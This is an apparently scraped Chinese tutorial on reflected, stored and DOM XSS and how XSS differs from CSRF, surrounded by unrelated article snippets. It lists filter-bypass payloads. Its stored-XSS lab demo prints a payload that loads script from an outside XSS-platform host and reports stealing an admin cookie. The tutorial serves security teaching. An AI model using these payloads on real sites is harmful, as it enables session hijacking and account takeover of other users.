<em>Mac</em>Book项目 2009年学校开始实施<em>Mac</em>Book项目,所有师生配备一本<em>Mac</em>Book,并同步更新了校园无线网络。学校每周进行电脑技术更新,每月发送技术支持资料,极大改变了教学及学习方式。因此2011
2021-06-01 09:32:01
上篇文章給大家帶來了XML實體注入(XXE)不知道小夥伴們學了後有沒有自己去運用,今天給大家帶來了一個名為跨站指令碼攻擊(XSS)的漏洞的介紹。
XSS 攻擊全稱跨站指令碼攻擊,XSS 是一種在 web 應用中的安全漏洞,它允許攻擊者將程式碼植入到 web 網站裡面,供給其它使用者 存取,當用戶存取到有惡意程式碼的網頁就會產生 xss 攻擊。
之前講過CSRF漏洞,它同樣也是利用使用者存取網站連結來進行攻擊,那麼它與XSS漏洞之間的區別是什麼,在我個人的理解中可以分為兩個大方向:
原理不同,CSRF利用的是網站本身的漏洞來去攻擊,而XSS則是將攻擊程式碼插入網站中來進行攻擊。
利用環境不同, CSRF攻擊中需要受害者登入網站,網站有認證資訊才能攻擊,而XSS不用。
首先XSS有三種攻擊方式:
接下來我會分開詳細的講解這幾種型別是怎樣利用的:
使用者端通過某種方式向伺服器端傳送惡意JS程式碼=>伺服器將未過濾或過濾不徹底的惡意JS程式碼輸出(返回給瀏覽器)=>瀏覽器中的JS直譯器解析惡意JS程式碼,使使用者受到攻擊。
一個經典的XSS攻擊請求,然網頁彈出xss:
<script>alert(/xss/)</script>
當然不止這一個,很多情況下一些函數被過濾了,我們也有繞過過濾的方法,下面就簡單列舉幾個:
<script>alert(vulnerable)</script> %3Cscript%3Ealert('XSS')%3C/script%3E <script>alert('XSS')</script> <img src="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"> <DIV STYLE="width: expression(alert('XSS'));"> 1"><ScscriptRipt>alert(1)</ScscriptRipt>
接下來給大家帶來一個滲透的例子:
我們開啟靶機檢視原始碼,發現它是向伺服器提交了一個name引數,而這一個引數值插入到了<h3></h3>
標籤之間 ,因此可能存在XSS漏洞。
於是我們構造請求,將name賦值為:
<script>alert('xss')</script>
一個經典的彈窗payload,我們提交請求檢視效果:
成功彈窗,一次簡單的反射XSS攻擊成功達成。
儲型XSS的特別之處在於提交的程式碼會儲存在伺服器端(資料庫、記憶體、檔案系統等),下次請求時目標頁面時不用再提交XSS程式碼。所以儲存型XSS的攻擊效果更強,而且攻擊的範圍更廣。一般存在於留言板評論等地區。 用一個靶機來給大家演示一下:
一個可以發表資訊樹洞網站,有登入和評論系統,我們先隨便評論幾句測試一下:
構造PAYLOAD
<IMG SRC="javascript.:alert('XINO');">
我們簡單存取一下儲存路徑,發現是一個錯報的圖片,存在XSS漏洞,接著我們利用XSS平臺(一個DIY構造不同XSS攻擊功能程式碼的網站,當XSS生效時可以回到網站檢視攻擊是否生效和攻擊得出的資訊)構造XSSpayload
得到構造好的惡意攻擊連結:
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='https://xss9.com/PAns';>
提交在評論區然後存取儲存路徑,回到XSS平臺檢視:
得到admin管理員的cookie,我們就可以通過修改cookie來獲取管理員許可權,從而進行進一步的滲透攻擊。上面就是一個簡單的儲存型XSS的利用。
攻擊程式碼並不需要伺服器解析響應,利用的是瀏覽器端的DOM解析,在使用者端直接輸出DOM內容的時候極易觸發DOM型XSS漏洞。因為利用比較少,就放個簡單payload:
<img src=1 onerror=alert(1)>
根據上文的演示大家也能看出來XSS的危害了吧,這裡就綜合簡述一下它的危害。
今天比較詳細的講了XSS漏洞的原理以及應用方法,其中比較重要的是反射型XSS與儲存型XSS,這兩個的利用條件並不是很苛刻而且效果很突出,有興趣的小夥伴可以自己去搭建靶機來進行合法測試,切勿隨意對別人網站進行測試攻擊,網際網路並非法外之地,以上就是跨站指令碼攻擊XSS與CSRF區別方法詳解的詳細內容,更多關於跨站指令碼攻擊XSS CSRF的資料請關注it145.com其它相關文章!
相關文章
<em>Mac</em>Book项目 2009年学校开始实施<em>Mac</em>Book项目,所有师生配备一本<em>Mac</em>Book,并同步更新了校园无线网络。学校每周进行电脑技术更新,每月发送技术支持资料,极大改变了教学及学习方式。因此2011
2021-06-01 09:32:01
综合看Anker超能充系列的性价比很高,并且与不仅和iPhone12/苹果<em>Mac</em>Book很配,而且适合多设备充电需求的日常使用或差旅场景,不管是安卓还是Switch同样也能用得上它,希望这次分享能给准备购入充电器的小伙伴们有所
2021-06-01 09:31:42
除了L4WUDU与吴亦凡已经多次共事,成为了明面上的厂牌成员,吴亦凡还曾带领20XXCLUB全队参加2020年的一场音乐节,这也是20XXCLUB首次全员合照,王嗣尧Turbo、陈彦希Regi、<em>Mac</em> Ova Seas、林渝植等人全部出场。然而让
2021-06-01 09:31:34
目前应用IPFS的机构:1 谷歌<em>浏览器</em>支持IPFS分布式协议 2 万维网 (历史档案博物馆)数据库 3 火狐<em>浏览器</em>支持 IPFS分布式协议 4 EOS 等数字货币数据存储 5 美国国会图书馆,历史资料永久保存在 IPFS 6 加
2021-06-01 09:31:24
开拓者的车机是兼容苹果和<em>安卓</em>,虽然我不怎么用,但确实兼顾了我家人的很多需求:副驾的门板还配有解锁开关,有的时候老婆开车,下车的时候偶尔会忘记解锁,我在副驾驶可以自己开门:第二排设计很好,不仅配置了一个很大的
2021-06-01 09:30:48
不仅是<em>安卓</em>手机,苹果手机的降价力度也是前所未有了,iPhone12也“跳水价”了,发布价是6799元,如今已经跌至5308元,降价幅度超过1400元,最新定价确认了。iPhone12是苹果首款5G手机,同时也是全球首款5nm芯片的智能机,它
2021-06-01 09:30:45